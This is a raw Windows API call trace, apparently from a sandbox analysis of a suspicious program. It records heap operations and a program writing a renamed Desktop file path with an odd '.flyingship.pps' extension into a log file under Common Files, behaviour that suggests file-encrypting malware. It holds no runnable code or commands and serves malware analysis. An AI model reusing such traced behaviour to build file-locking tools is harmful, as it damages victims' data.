[0158.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.729] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.729] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.729] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.729] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0158.729] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0158.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0158.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0158.730] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x57b, lpOverlapped=0x0) returned 1 [0158.730] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x57b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.730] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0158.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0158.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\n", cchWideChar=64, lpMultiByteStr=0x8db138, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 64 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.731] WriteFile (in: hFile=0x120, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3f, lpOverlapped=0x0) returned 1 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.731] CloseHandle (hObject=0x120) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0158.733] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0158.733] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.734] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.734] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.734] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0158.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0158.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0158.734] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0158.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0158.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0158.735] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.735] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0158.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0158.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0158.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.739] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) 